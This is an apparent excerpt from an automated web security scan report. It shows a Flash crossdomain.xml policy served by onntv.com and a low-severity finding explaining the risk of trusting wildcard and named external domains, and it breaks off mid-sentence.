ETag: "effff9db19f6fd79e0766f5c7cc16797"
Accept-Ranges: bytes
Content-Type: text/xml; charset=ISO-8859-1
Date: Wed, 04 May 2011 01:41:13 GMT
Expires: Mon, 03 May 2010 19:41:13 GMT
Connection: close
Content-Length: 552

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.nwherald.com" />
<allow-access-from domain="*.chitownburbs.com" />
<allow-access-from domain="*.kcchronicle.com" />
<allow-access-from domain="*.mchenrycountysports.com" />
<allow-access-from domain="*.weeklyjournals.com" />
<allow-access-from domain="*.lakecountyjournals.com" />
<allow-access-from domain="*.elconquistadornews.com" />
...[SNIP]...

6.185. http://www.onntv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.onntv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific doma